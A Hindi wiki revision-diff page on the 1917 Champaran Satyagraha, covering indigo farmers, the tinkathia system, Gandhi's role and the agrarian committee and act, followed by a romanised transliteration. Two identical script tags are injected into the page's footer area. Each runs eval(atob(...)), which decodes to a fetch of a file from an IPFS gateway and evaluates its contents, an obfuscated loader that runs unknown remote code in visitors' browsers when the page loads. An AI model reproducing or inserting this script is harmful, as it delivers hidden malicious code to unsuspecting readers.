Difference between revisions of "चम्पारन सत्याग्रह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:महात्मा गाँधी (को हटा दिया गया हैं।))
Line 1: Line 1:
*'''चम्पारन सत्याग्रह''' का प्रारम्भ [[गाँधीजी]] के द्वारा किया गया था। चम्पारन का मामला बहुत पुराना था।
+
'''चम्पारन सत्याग्रह''' का प्रारम्भ [[गाँधीजी]] के द्वारा किया गया था। चम्पारन का मामला बहुत पुराना था।
 
*चम्पारन के किसानों से [[अंग्रेज़]] बाग़ान मालिकों ने एक अनुबंध करा लिया था।
 
*चम्पारन के किसानों से [[अंग्रेज़]] बाग़ान मालिकों ने एक अनुबंध करा लिया था।
 
*इस अनुबंध के अंतर्गत किसानों को ज़मीन के 3/20वें हिस्से पर नील की खेती करना अनिवार्य था। इसे 'तिनकठिया पद्धति' कहते थे।
 
*इस अनुबंध के अंतर्गत किसानों को ज़मीन के 3/20वें हिस्से पर नील की खेती करना अनिवार्य था। इसे 'तिनकठिया पद्धति' कहते थे।
*19वीं शताब्दी के अन्त में रासायनिक [[रंग|रगों]] की खोज और उनके प्रचलन से नील के बाज़ार में गिरावट आने लगी, जिससे नील बाग़ान के मालिक अपने कारखाने बंद करने लगे।
+
*19वीं [[शताब्दी]] के अन्त में रासायनिक [[रंग|रगों]] की खोज और उनके प्रचलन से नील के बाज़ार में गिरावट आने लगी, जिससे नील बाग़ान के मालिक अपने कारखाने बंद करने लगे।
 
*किसान भी नील की खेती से छुटकारा पाना चाहते थे। गोरे बाग़ान मालिकों ने किसानों की मजबूरी का फ़ायदा उठाकर अनुबंध से मुक्त करने के लिए लगान को मनमाने ढंग से बढ़ा दिया, जिसके परिणामस्वरूप विद्रोह शुरू हुआ।
 
*किसान भी नील की खेती से छुटकारा पाना चाहते थे। गोरे बाग़ान मालिकों ने किसानों की मजबूरी का फ़ायदा उठाकर अनुबंध से मुक्त करने के लिए लगान को मनमाने ढंग से बढ़ा दिया, जिसके परिणामस्वरूप विद्रोह शुरू हुआ।
*1917 ई. में चम्पारण के राजकुमार शुक्ल ने सत्याग्रह की धमकी दी, जिससे प्रशासन ने अपना आदेश वापस ले लिया।
+
*[[1917]] ई. में चम्पारण के राजकुमार शुक्ल ने सत्याग्रह की धमकी दी, जिससे प्रशासन ने अपना आदेश वापस ले लिया।
 
*चम्पारन में [[गाँधीजी]] द्वारा सत्याग्रह का सर्वप्रथम प्रयोग करने का प्रयास किया गया।
 
*चम्पारन में [[गाँधीजी]] द्वारा सत्याग्रह का सर्वप्रथम प्रयोग करने का प्रयास किया गया।
 
*चम्पारन में गाँधीजी के साथ अन्य नेताओं में [[राजेन्द्र प्रसाद]], ब्रजकिशोर, महादेव देसाई, नरहरि पारिख तथा जे.बी.कृपलानी थे।
 
*चम्पारन में गाँधीजी के साथ अन्य नेताओं में [[राजेन्द्र प्रसाद]], ब्रजकिशोर, महादेव देसाई, नरहरि पारिख तथा जे.बी.कृपलानी थे।
 
*इस आन्दोलन में गाँधीजी के नेतृत्व में किसानों को एकजुटता को देखते हुए सरकार ने मामले की जाँच की।
 
*इस आन्दोलन में गाँधीजी के नेतृत्व में किसानों को एकजुटता को देखते हुए सरकार ने मामले की जाँच की।
*जुलाई, 1917 ई. में 'चम्पारण एग्रेरियन कमेटी' का गठन किया। [[गाँधीजी]] भी इसके सदस्य थे।
+
*[[जुलाई]], 1917 ई. में 'चम्पारण एग्रेरियन कमेटी' का गठन किया। [[गाँधीजी]] भी इसके सदस्य थे।
 
*इस कमेटी के प्रतिवेदन पर 'तिनकठिया प्रणाली' को समाप्त कर दिया तथा किसानों से अवैध रूप से वसूले गए धन का 25 प्रतिशत वापस कर दिया गया।
 
*इस कमेटी के प्रतिवेदन पर 'तिनकठिया प्रणाली' को समाप्त कर दिया तथा किसानों से अवैध रूप से वसूले गए धन का 25 प्रतिशत वापस कर दिया गया।
*1919 ई. में 'चम्पारण एग्रेरियन अधिनियम' पारित किया गया तथा किसानों की स्थिति में सुधार हुआ।
+
*[[1919]] ई. में 'चम्पारण एग्रेरियन अधिनियम' पारित किया गया तथा किसानों की स्थिति में सुधार हुआ।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 05:47, 17 April 2012

champaran satyagrah ka prarambh gaandhiji ke dvara kiya gaya tha. champaran ka mamala bahut purana tha.

  • champaran ke kisanoan se aangrez bagan malikoan ne ek anubandh kara liya tha.
  • is anubandh ke aantargat kisanoan ko zamin ke 3/20vean hisse par nil ki kheti karana anivary tha. ise 'tinakathiya paddhati' kahate the.
  • 19vian shatabdi ke ant mean rasayanik ragoan ki khoj aur unake prachalan se nil ke bazar mean giravat ane lagi, jisase nil bagan ke malik apane karakhane band karane lage.
  • kisan bhi nil ki kheti se chhutakara pana chahate the. gore bagan malikoan ne kisanoan ki majaboori ka fayada uthakar anubandh se mukt karane ke lie lagan ko manamane dhang se badha diya, jisake parinamasvaroop vidroh shuroo hua.
  • 1917 ee. mean champaran ke rajakumar shukl ne satyagrah ki dhamaki di, jisase prashasan ne apana adesh vapas le liya.
  • champaran mean gaandhiji dvara satyagrah ka sarvapratham prayog karane ka prayas kiya gaya.
  • champaran mean gaandhiji ke sath any netaoan mean rajendr prasad, brajakishor, mahadev desaee, narahari parikh tatha je.bi.kripalani the.
  • is andolan mean gaandhiji ke netritv mean kisanoan ko ekajutata ko dekhate hue sarakar ne mamale ki jaanch ki.
  • julaee, 1917 ee. mean 'champaran egreriyan kameti' ka gathan kiya. gaandhiji bhi isake sadasy the.
  • is kameti ke prativedan par 'tinakathiya pranali' ko samapt kar diya tatha kisanoan se avaidh roop se vasoole ge dhan ka 25 pratishat vapas kar diya gaya.
  • 1919 ee. mean 'champaran egreriyan adhiniyam' parit kiya gaya tatha kisanoan ki sthiti mean sudhar hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>